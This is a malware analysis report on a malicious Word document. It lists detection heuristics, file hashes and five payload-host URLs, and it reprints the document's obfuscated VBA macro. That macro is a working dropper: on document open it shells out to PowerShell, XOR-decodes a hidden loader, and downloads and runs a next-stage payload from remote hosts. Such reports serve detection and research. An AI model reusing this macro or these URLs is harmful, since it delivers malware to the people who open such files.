Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c9b9df7735f83732…

MALICIOUS

Office (OLE)

115.5 KB Created: 2018-06-14 13:37:00 Authoring application: Microsoft Office Word First seen: 2018-06-21
MD5: 642bea9ed625a094884a1f6ca6e2bb6e SHA-1: ca819a1bd0d55a3dd995df22e306a2313dfa723b SHA-256: c9b9df7735f837322f0f371c634ea9e0a61ed4609bfb5af7a64a25b7410f5514
232 Risk Score

Heuristics 8

  • ClamAV: Doc.Malware.Valyria-6801300-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6801300-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    rMzmtz = Sqr(90407)
    JRpQzSpb = iFdctFAVL + VBA.Shell(vKidQdCPXMO + Chr(ZzCDdn + vbKeyP + XSERPb) + "owers" + jdUPZoLU + crIjQC + GKXwSrDwuEv + RcjrU + LdBDAd, 19758 - 19758)
    dFYjkQ = lOKjPl - BobUi / 44119 / iYGYTR - 223327908 + Hex(zsdhlZ) * oiUzrC - Round(78513)
  • Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URL
    A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_open()
    On Error Resume Next
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://aspaud.com/7SUmuf/ Referenced by macro
    • http://mbfcs.com/tNs3Awl/Referenced by macro
    • http://www.euro-specialists.com/dSIdR/Referenced by macro
    • http://beurer.by/0QyKvqn/Referenced by macro
    • http://rasslin.jp/aOx3B/Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15463 bytes
SHA-256: 75d5d03a32f80afd9321b13853f0d487eb05d8cf19ff348d6e812141bee268bd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
252 of 395 identifiers look randomly generated (e.g. 'JiujdhPPwGcABV'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "lpSJYHGtMLHQB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function JRpQzSpb()
On Error Resume Next
ZnVtj = EGlLDj - FHRwL / 65446 / raUWAR - 223327908 + Hex(OpPDZl) * NtIjk - Round(19264)
iAzpwW = 4931 + RDAsnv + (47129 * CDbl(rBDvtI) - OqsPR / CSng(48780) - Uqmjd / Hex(TJVLUZ) + 72542 - 12973)
KwsRV = BjjaV
AiaBVo = Sqr(66464)
ljiptI = KPnOz - IPLPCi / 73210 / cIXlwc - 223327908 + Hex(lEiti) * aJlsuF - Round(32275)
fzSzs = 34547 + pQVIi + (96399 * CDbl(sNIRaY) - mqHod / CSng(58612) - rjMsTi / Hex(NbJoSA) + 54446 - 77339)
FjNhX = uWIDKG
EDYwB = Sqr(18386)
mlzCz = wXzAH - jPQzEX / 30529 / ziIzM - 223327908 + Hex(oDVrtB) * aJDZIj - Round(25156)
bKEuf = 14780 + KFUPD + (65483 * CDbl(aWIZV) - DdmGu / CSng(46200) - svoXK / Hex(SiaozZ) + 17501 - 49594)
ZfliDE = sJtWXA
ZQPAW = Sqr(67427)
mEWWN = QsraB - YqMvzB / 70869 / diFzvF - 223327908 + Hex(Vzuvw) * Tipzk - Round(84491)
EczqY = 31139 + BFGGPG + (11758 * CDbl(XwqCo) - qJhzhp / CSng(87790) - hQuTH / Hex(bcSHw) + 78435 - 2337)
DrwSPt = JSKdHK
rMzmtz = Sqr(90407)
JRpQzSpb = iFdctFAVL + VBA.Shell(vKidQdCPXMO + Chr(ZzCDdn + vbKeyP + XSERPb) + "owers" + jdUPZoLU + crIjQC + GKXwSrDwuEv + RcjrU + LdBDAd, 19758 - 19758)
dFYjkQ = lOKjPl - BobUi / 44119 / iYGYTR - 223327908 + Hex(zsdhlZ) * oiUzrC - Round(78513)
MzkDwW = 53437 + Auvwi + (9386 * CDbl(FLWwPJ) - iERjMs / CSng(85893) - VtHDk / Hex(iaraI) + 69632 - 15487)
MZQWn = MBzDn
iUriL = Sqr(13586)
JwYkG = aIXsR - bsoGoz / 72500 / XvuaKM - 223327908 + Hex(PjrUWS) * JwihDP - Round(34310)
RKQzFo = 41970 + BdLhNG + (13662 * CDbl(rUvBI) - DwZzRc / CSng(30340) - BTtGR / Hex(jswAH) + 66039 - 44977)
PZVWsc = PNckFw
LKOZIs = Sqr(73007)
End Function
Private Sub Document_open()
On Error Resume Next
lFJvW = pwPRwY - iAzmz / 77015 / loaSV - 223327908 + Hex(mqXhQt) * riZjAX - Round(92133)
NCwauh = 21366 + fYufq + (65793 * CDbl(YHuWhi) - jJkwS / CSng(87815) - HIPftv / Hex(kGIhGQ) + 95456 - 79527)
cOQZPT = HkLHm
uZlci = Sqr(55979)
NBCsE = utdNGD - zMDsNS / 63223 / KjzSr - 223327908 + Hex(wjQRDd) * VlwJGH - Round(99419)
cfwfrZ = 60226 + zbiAC + (88887 * CDbl(AaNlb) - kbWlwv / CSng(34271) - wuinwB / Hex(htsbr) + 89116 - 33374)
KSpUZ = rtcwd
joRfAr = Sqr(36502)
JRpQzSpb
fOEXq = vVXld - jQYiNM / 12598 / wNrfj - 223327908 + Hex(WYQmwT) * ZAPmP - Round(53921)
REZMn = 96163 + NvCZA + (58302 * CDbl(HiHKhW) - FJEpC / CSng(39145) - dfirn / Hex(UrktT) + 3262 - 73835)
zinOCk = NmmZmt
iloCFB = Sqr(11580)
CJsJw = WZNRv - lJuoml / 20073 / jRjUVf - 223327908 + Hex(ZGQtjl) * JAEtc - Round(3681)
pFRXZn = 25724 + WEloKh + (18678 * CDbl(Jwzkw) - jrJHr / CSng(54202) - MKwCY / Hex(UisMc) + 28204 - 35649)
wPVhY = ASMGpt
KksNK = Sqr(82553)
End Sub


Attribute VB_Name = "JiujdhPPwGcABV"
Function jdUPZoLU()
On Error Resume Next
pijWfA = Sqr(8710)
GYhTdL = JwtQA - SSSFv / 86146 / BdCiMZ - 223327908 + Hex(rlwPwH) * wnjArw - Round(88961)
jcvbUo = 24025 + rWifY + (31560 * CDbl(wIDjO) - DQWRV / CSng(90463) - McELNT / Hex(JUGZj) + 69559 - 23394)
LIMvv = AHJHv
ZWiwlPsz = "HeLL" + " & (" + " $EnV:Com" + "spEC[4,26" + ",25]-JO" + "IN'') ( " + Chr(34)
JzSaCi = Sqr(55389)
iNutZ = sFriD - SwfNJ / 97373 / ILQiW - 223327908 + Hex(bFKikC) * tVCblk - Round(92384)
cVCGDj = 66399 + zdUsn + (39127 * CDbl(lFEuhE) - PKBLF / CSng(58931) - hjofi / Hex(SdtnP) + 22568 - 46547)
bnTLOW = ORjHc
asvCnro = "$( SEt 'Of" + "s'  '')" + Chr(34) + "+" + " [STRI" + "Ng]( [chaR[]] " + "( " + "15," + "92,115 ,68, 126"
zLDRp = Sqr(18846)
NMSRd = BVwdtp - CjHrt / 76117 / hjcGKO - 223327908 + Hex(EpUFi) * OzFaYA - Round(50214)
WUANi = 46331 + wAhWG + (52756 * CDbl(IwuDc) - CAXXU / CSng(87283) - KSsqd / Hex(zaZUo) + 86992 - 25318)
lowlH = JMUFR
VkQYCd = ",90, 11 , 22,1" + "1," + " 69 ,78,92 , 6" + ",68 ,7" + "3, 65 , 78,72,9"
fwHPr = Sqr(43364)
joCpXw = BCKJv - rmDAl / 9229 / AGicF - 223327908 + Hex(TjHDS) * ONAnzF - Round(92655)
SdkLHO = 83229 + jcYPFv + (10146 * CDbl(hSsNic) - lLGLh / CSng(75203) - HjcCvT / Hex(ORmiB) + 45517 - 642)
EcquED = RDMYC
BLIDUadhM = "5, " + "11 , 89 , 7" + "4 ,69 , 79" + " , "
ivXjtq = Sqr(24189)
EAKCEp = qljhD - EVoPV / 59531 / KpIMmZ - 223327908 + Hex(hDKtV) * AEJJYZ - Round(68519)
EtZKak = 33135 + TtzsNj + (14771 * CDbl(zEuphD) - XFkcat / CSng(75549) - woJKT / Hex(dZUisu) + 44704 - 69486)
OQjYs = fasvHd
EhOtWimY = "68 " + ", 70,16 , 15, 6" + "5, 1" + "02 , 92, 95" + " , 106,11 ," + "22 , 11, 69" + ", "
jbiNa = Sqr(51111)
EbcQZ = iwbJj - TTjSB / 43796 / LvUiBv - 223327908 + Hex(UASrsV) * tPPss - Round(45340)
dPszPf = 69236 + nanLTC + (114 * CDbl(frvvM) - huWGv / CSng(59489) - TrVJz / Hex(oQLJu) + 99283 - 74504)
oHOqj = aZjTYL
qODlR = "78 , 92," + "6 ,68 ,73" + " ," + " 65,78 ," + "72, 95, 11 ,12" + "0 ,82 ,88" + " ,95,7"
izttdd = Sqr(68365)
rfJoz = kTszi - VOmLw / 47743 / Hlalhq - 223327908 + Hex(AsHMJZ) * uLvjmf - Round(21726)
OSktaU = 98543 + hfkQNA + (49301 * CDbl(TZIzP) - dkiqB / CSng(13016) - DJOCap / Hex(fVRXYd) + 46965 - 74219)
GSjzL = ThzJcq
qQmzDSpabK = "8 ,70 , 5 " + ",101 , 78" + " ," + " 95 ,5 ,124 ,7" + "8 ," + "73,104,71 " + ", 66,78 ,69 "
jdUPZoLU = ZWiwlPsz + asvCnro + VkQYCd + BLIDUadhM + EhOtWimY + qODlR + qQmzDSpabK
End Function
Function crIjQC()
On Error Resume Next
oUBSTD = Sqr(69877)
tBCVl = YFfJnO - LzPHoa / 44912 / lkpuRw - 223327908 + Hex(GMOVj) * AzJZQP - Round(29952)
iQtcwN = 20480 + MfpFwb + (4843 * CDbl(fLtmaj) - HnaIfh / CSng(47483) - FtwLv / Hex(EoRAp) + 83912 - 648)
EfitQd = KivEf
OJIMJRoQoLH = ",9" + "5 , 16 ," + " 15,113, " + "124, 101,66, 7" + "3 ,65" + " , " + "11 ,22 ,1" + "1, 12,6"
lEPRWj = Sqr(57192)
RFWqL = RHTkdQ - aNhST / 16615 / clLzOV - 223327908 + Hex(EzEMn) * cbOmC - Round(40887)
HQMaUp = 36487 + SvShqL + (1133 * CDbl(hYLHO) - FlIMV / CSng(66763) - BjsTJ / Hex(jwzwZw) + 28458 - 4972)
VfDlF = WmLicM
LSjKbhEKNSM = "7,9" + "5, 95, 91 ," + "17 ,4, 4, 74" + " ,88,91, 74, 9" + "4 " + ",79" + ",5 , 72,68"
ovtnLr = Sqr(75839)
Dlvrwv = zslAu - NaQlC / 58317 / pTsjIq - 223327908 + Hex(SjKdV) * XGijHz - Round(48941)
vifuX = 54462 + bNKPXp + (85917 * CDbl(wwuQwn) - njwOc / CSng(95670) - NPFKPc / Hex(wUPafu) + 38089 - 58750)
hoFMl = XKqhwC
njPuDncHi = " , 70 ," + " 4 , 28 , 1" + "20 , 126 ,70 " + ", 94 ,77 , 4,10" + "7,67, 95"
AoRuU = Sqr(48619)
YDIkcC = BJwBs - anXzH / 69249 / REQQH - 223327908 + Hex(ciYHP) * YNjQz - Round(66452)
sjsOi = 16175 + pQiIfS + (73721 * CDbl(vjiFE) - PjjNY / CSng(18692) - zGHUHT / Hex(WlRZoo) + 32424 - 18275)
amITj = bVcCJN
AJnwC = " ,95, 91 ,17 ," + " 4, 4,7" + "0," + " 73,77,72, " + "88" + " ,5 , " + "72 ,68 , 70 " + ", 4,9"
crIjQC = OJIMJRoQoLH + LSjKbhEKNSM + njPuDncHi + AJnwC
End Function
Function GKXwSrDwuEv()
On Error Resume Next
nOGAF = Sqr(5239)
qsBjUi = dMOvP - FVLGHK / 19730 / sRLbWi - 223327908 + Hex(aTddE) * iOozK - Round(51727)
kPbTms = 57258 + aacBj + (74258 * CDbl(wqWYQ) - QhBpa / CSng(56761) - GwVHpd / Hex(JmQiGE) + 59163 - 87869)
TcQPq = YzdNRR
JdFwNZzVE = "5, 101 , 88 " + ",24, 106 ,92 , " + "71 , " + "4 ,107 ,67"
GqDBW = Sqr(21851)
rvLvZX = mrtVO - aAkzRt / 37180 / QjLvD - 223327908 + Hex(TLJCK) * tbpWQY - Round(17749)
sNwbpE = 95639 + KDtlS + (22358 * CDbl(aGXJw) - znaZCM / CSng(8159) - wYSkiL / Hex(jnzsNX) + 4291 - 68330)
mRrJO = zRCAs
bjvXOQN = ", " + "95, 95" + " ,9" + "1, 17, 4" + " , 4 ,92 ,9" + "2,92 , 5, 78," + "94, 89,6" + "8, 6,88 ," + "91,78 , 7"
cqLTz = Sqr(88329)
UqsJwL = ptWRUV - Zdjzwi / 81190 / qwfZw - 223327908 + Hex(TvfETL) * bojpoi - Round(65568)
aLzAV = 40948 + airLcl + (98304 * CDbl(Njtki) - PQKGz / CSng(7109) - FFSht / Hex(AdXQCn) + 4943 - 72756)
MATBoE = FGDkds
oQXqF = "2 ," + "66 ,74 " + ", 71 ," + "66,88 , 95 "
JjGzFY = Sqr(54727)
qLuFq = jNHWO - fJtAFW / 93170 / rjZvWV - 223327908 + Hex(RCHfi) * BNwOfl - Round(42957)
BAwiW = 27780 + VwrNB + (18713 * CDbl(zozKKA) - vKazJ / CSng(12940) - GSLEIJ / Hex(bsESaa) + 24125 - 48095)
jWhQq = NcTAL
okvQrf = ", 88 , 5,72 ,68" + " ,70,4, " + "79 , " + "12" + "0, 9" + "8 ,79," + "121" + " ,4" + " ,10" + "7 ,67,95, 95 ,"
tRMQF = Sqr(59443)
qTTzB = fpQBF - olNnv / 50074 / unmXcV - 223327908 + Hex(NtzJh) * hMndt - Round(96613)
hSGmzi = 40178 + PKArj + (78272 * CDbl(vwmala) - mRVwd / CSng(23171) - izNvG / Hex(jHKPz) + 31082 - 33219)
ESDzt = AnFtj
aIoTKTacSz = "91,17 ,4 ," + "4, 73,78" + ", 94, 89 ,78, " + "89, 5, 73, 82" + ", 4 ,27 ,122 ,8" + "2 ,96,9" + "3, 90" + ",69 , 4, 1"
tKfBav = Sqr(69979)
VrtuL = FONIZV - diijO / 4645 / bIiYuF - 223327908 + Hex(aiiOR) * aUHDAX - Round(90280)
ZkQEwq = 54675 + zmqGUh + (53285 * CDbl(zkuzVi) - WsJkNf / CSng(78759) - Utqwz / Hex(jhCVMz) + 34749 - 53239)
zERtN = HdYjiQ
muLCppYW = "07, " + "67,95 , " + "95 ," + " 91,17, 4 , 4 " + ", 89,74,88, " + "88" + " ,7" + "1,66,69, 5,"
UnGAZp = Sqr(41900)
wWCRpM = XjwZsk - DBdsiZ / 68612 / ttvuTr - 223327908 + Hex(wHTjls) * Ejtop - Round(302)
rMJUAG = 44533 + jiuIlm + (18008 * CDbl(bfqHuU) - rfoiz / CSng(97554) - JCXrjH / Hex(iARXRb) + 30855 - 92754)
HwqsGa = bAVMt
szOVKpPpMbn = " 65 , 91, 4,74" + ",100 ," + " 83, 24 " + ", 105 ,4,12, 5 " + ",120 ,91, 71 " + ",66 , 95, 3 ,12"
BZtHZh = Sqr(40837)
SiNFf = zdqFQ - cQiHBn / 1683 / dOofUz - 223327908 + Hex(TNjCsm) * QsVqi - Round(96327)
dJWus = 69644 + hrGMzB + (82175 * CDbl(zzqjjr) - DrusH / CSng(76879) - aHjiWi / Hex(JwwFVD) + 71863 - 67812)
cqDAak = WhLwC
dwwOmuriPw = ",107 ,12 , " + "2 ,16 , 15 ,97," + " 10" + "2 , 100 , 92 " + ",72 ,121," + "11 , " + "22, 11 ,15" + ",92 ,115 ," + " 68," + " 126 ,90"
JkHzu = Sqr(56299)
diVwXA = wHnkmN - TokzF / 18911 / ioPzO - 223327908 + Hex(bXRcf) * hhEqDR - Round(9591)
EqhkfH = 62701 + KDYMG + (449 * CDbl(lLICzB) - rKkkIY / CSng(53643) - QLLmLC / Hex(FzqPMU) + 88317 - 92443)
cizUkP = ulGmhb
qsdSGEraLF = ",5, 69 ,78 , 8" + "3 ,95 ," + " 3 ,26 ," + " 7"
GKXwSrDwuEv = JdFwNZzVE + bjvXOQN + oQXqF + okvQrf + aIoTKTacSz + muLCppYW + szOVKpPpMbn + dwwOmuriPw + qsdSGEraLF
End Function
Function RcjrU()
On Error Resume Next
RNiHC = Sqr(6994)
wpVoNw = iZLcw - zwlOjR / 62959 / OfXkV - 223327908 + Hex(JBBid) * KfEECG - Round(30552)
SvtFB = 16085 + TbqLEz + (61845 * CDbl(OwhjA) - TaPfq / CSng(61082) - lcuaqT / Hex(mKkBI) + 32309 - 70414)
sHZjH = WpvXBo
OMtcIhJG = ",11, 29, 28 " + ", " + "31, 19,2" + "5,27" + ", 2,1" + "6, 15,12" + "6 , 7" + "9,122 ,100 , 9" + "2, 77,11," + " 22"
NjFfwc = Sqr(92250)
BjHzf = FlaLX - nUHzi / 44456 / YNMhJX - 223327908 + Hex(cLMmm) * cjGIH - Round(82429)
WWiJzD = 85671 + LdYczM + (44034 * CDbl(sjLZB) - YDprR / CSng(35135) - oYkHrO / Hex(wuHwNT) + 11061 - 3363)
fKqjS = SUcQb
UGAYziJ = ",11 ,15 ,78 " + ",69 ," + "93,17 ,95 , 78" + " , 70,91" + ", 11,0,1"
nzjVU = Sqr(82293)
ZQFVIz = PcXzuI - TzNjW / 35827 / shbBpP - 223327908 + Hex(apFFc) * MpipX - Round(11262)
fWroBw = 50677 + suZnZ + (23645 * CDbl(HOzqrF) - XAZZb / CSng(50807) - jmFoL / Hex(FoRGIQ) + 7604 - 65794)
aBMnI = wwsYHz
MRqrwJKzJR = "1 , 12, 119 " + ",12 , 11 ,0" + ", 11" + ",15" + ", 97,102 ,1" + "00,92 , 72 , " + "121, 11,0, 11 " + ", 12,5, 78 ,"
WqWEp = Sqr(68974)
jhDnSm = bDUjP - BmOfP / 45757 / CDvwh - 223327908 + Hex(boBtL) * qXiaz - Round(70097)
jiiUTk = 56219 + mRuSDv + (58493 * CDbl(YIQUu) - wKsPP / CSng(87395) - UPHDXf / Hex(EVEVV) + 25058 - 84936)
CilQJZ = TAVpwY
ZizBKZuk = "83," + " 78 , 12 , 16" + ",7" + "7 " + ", 68,89,7" + "8 ,74 " + ", 72 , 67,3" + ", " + "15,66," + " 95 , 77,"
sFYfzX = Sqr(24685)
nOwkas = WBBczH - tGSMYT / 32132 / tXpMCH - 223327908 + Hex(QJjNH) * YWrfvD - Round(15991)
RXudmF = 11243 + KjZKIf + (48144 * CDbl(SMOvBD) - JCuNjv / CSng(17908) - aCWmS / Hex(FnuiQJ) + 7764 - 37704)
UktAA = zaSkbq
kLcKtmnSHl = "96," + "101,66, 11,66 ," + "69, 11, 15,113" + ", 124, 101, 66" + " , 73"
jhiBr = Sqr(63758)
FVcWji = ZjtnSh - ORWWQ / 75546 / PYwLrU - 223327908 + Hex(nvuEL) * QMsHB - Round(41667)
BUYuNq = 68508 + krvmA + (6797 * CDbl(kahdQ) - VlvVd / CSng(93746) - sDWhUd / Hex(EzwRFT) + 93858 - 59318)
IbUiF = RNnws
kLXzG = " ,65, 2, 80 " + ",95 , " + "89, 82 ,80," + "15 , 65,102, "
mtNwX = Sqr(60795)
PqvKfb = JjOcv - PNEjFp / 21863 / mNTJnK - 223327908 + Hex(nzUKO) * ihoFzq - Round(4121)
JqwfKo = 26174 + lowjG + (33897 * CDbl(BZPVv) - FhMQh / CSng(88098) - zXjPi / Hex(GZPMw) + 23249 - 15499)
XiLfi = vRQLfa
Sibuwhz = "92 ,95 ," + "10" + "6 ," + " 5, 1"
BjQLs = Sqr(48814)
kjLvX = dIZzr - OQqni / 55188 / EZzZsW - 223327908 + Hex(NwICF) * YVsti - Round(58604)
ddcAr = 32387 + WkuSjD + (63422 * CDbl(QdGwJP) - QzsSR / CSng(88204) - VdctZE / Hex(LEHZR) + 87296 - 92341)
jzTQU = ZpiqhU
AqBGkh = "11,68," + "92 " + ", 69" + " ,71 , " + "68, 74 , 79,1"
vKhjT = Sqr(77891)
Nsmmi = wULAXl - roHWF / 94982 / QNoudv - 223327908 + Hex(iGRii) * NZSdjG - Round(10741)
QUalJS = 48029 + zfAWt + (81100 * CDbl(sYzEz) - lWdRwS / CSng(3309) - bnLPWk / Hex(vHjQF) + 35675 - 82498)
qhvhaZ = hlKwm
ifuqXkwQ = "09, 66, 71," + "78,3 ," + " 15, 66 ,95 " + ", 77 " + ",96, 101,66 ," + "5, 12" + "7 , 68" + ",120 ," + "95 ," + "89 ,66, "
ztjHsl = Sqr(49382)
firSK = jMGUnL - NcAtsI / 87166 / bQOGL - 223327908 + Hex(SNUQpc) * ZhFwPh - Round(8427)
wzEsJj = 57434 + OtRoz + (20469 * CDbl(Vimwr) - ipYMwc / CSng(17840) - CGEMzQ / Hex(NkaXb) + 69881 - 46681)
mYPihS = HDKiW
dGJXRhBQvFo = "69,76, 3, 2 " + ",7,11 ,15" + ", 126,79,122," + "10" + "0 ,92 ," + "77 , 2,16, " + "120,95, 74 ,8" + "9 ,95 , 6" + " , 123,89" + " ,68,72,78, 8"
RcjrU = OMtcIhJG + UGAYziJ + MRqrwJKzJR + ZizBKZuk + kLcKtmnSHl + kLXzG + Sibuwhz + AqBGkh + ifuqXkwQ + dGJXRhBQvFo
End Function
Function LdBDAd()
On Error Resume Next
zdmwV = Sqr(78284)
XCrOr = LSfPL - jnkmj / 36175 / RKMzwj - 223327908 + Hex(FSQhtj) * otKEGd - Round(28132)
DOcMz = 11293 + zmDzj + (9576 * CDbl(uuvcao) - LIRtTq / CSng(4342) - GQMwVV / Hex(clQbq) + 27880 - 56991)
QHzMr = QjOAdj
inmYo = "8, 88, " + "11 ,15 " + ", 126 , 79 , " + "122 ,100, 92,77" + ", 16 , 73 ,89, " + "78, 74 ," + "64, 16,86,72" + ",7" + "4, 95, 72"
ALFVnI = Sqr(50789)
iWQiQa = ZJpbUF - OMLUWB / 41616 / abpzSi - 223327908 + Hex(UPSDcD) * Pzqlmu - Round(10637)
IKDtf = 19099 + sCwVij + (84829 * CDbl(ahcpMz) - bnSqkp / CSng(6858) - iQlSji / Hex(LbTPY) + 31385 - 74152)
SkLfs = POqDdu
QAFAd = ", 67,80, 92" + " ,89 ,66,95 ,78" + ",6 ,67" + " ,68 ,88, 95 ,"
HSdww = Sqr(78870)
KrtEC = GzbIj - dlTXUV / 10311 / Hmbbh - 223327908 + Hex(UFsEp) * HiUSY - Round(89077)
ptSIJu = 80058 + JQdpT + (93082 * CDbl(ikObr) - mWMKil / CSng(18407) - fiJSza / Hex(XdcAP) + 19618 - 59161)
oSkHwt = TmZSl
pDjjKRqUi = "11 ,15, 116, 5" + " , 110" + " ," + " 83, 72 ,78, " + "91, 95 ,66, 68" + ", 6" + "9,5, 102, " + "78 , 88 ," + "88 , 74 ,76,78" + ", 16 ,86 "
YOLBAn = Sqr(92470)
dXrRlj = XmziG - FEwOTz / 83988 / SpZBI - 223327908 + Hex(doFDd) * OjtiS - Round(21631)
thtXPR = 45491 + CAEWTV + (41893 * CDbl(QAwazW) - bljrAH / CSng(6458) - zwNRZ / Hex(zDGWij) + 32148 - 51671)
jRfAr = hBQouI
wmYMudYVk = ", 86) |ForeaCH" + "-ObjECt {[chaR]" + "($_ -" + "BXOR'0x2b'" + " )})+" + Chr(34) + "$(Set-Var"
lcPrz = Sqr(110)
sYPtZ = aajYdd - QZRHb / 93685 / ztaYZo - 223327908 + Hex(WORNu) * YZwXD - Round(21140)
qEiLiR = 32356 + VwihwE + (9566 * CDbl(VKOvI) - KEbHrh / CSng(9460) - TZRWnz / Hex(YLQChB) + 70493 - 31042)
hzrhh = DTKPn
FuonFKzHWWo = "IaBLe  'OFS'" + "  ' ' ) " + Chr(34) + " " + ")"
LdBDAd = inmYo + QAFAd + pDjjKRqUi + wmYMudYVk + FuonFKzHWWo
End Function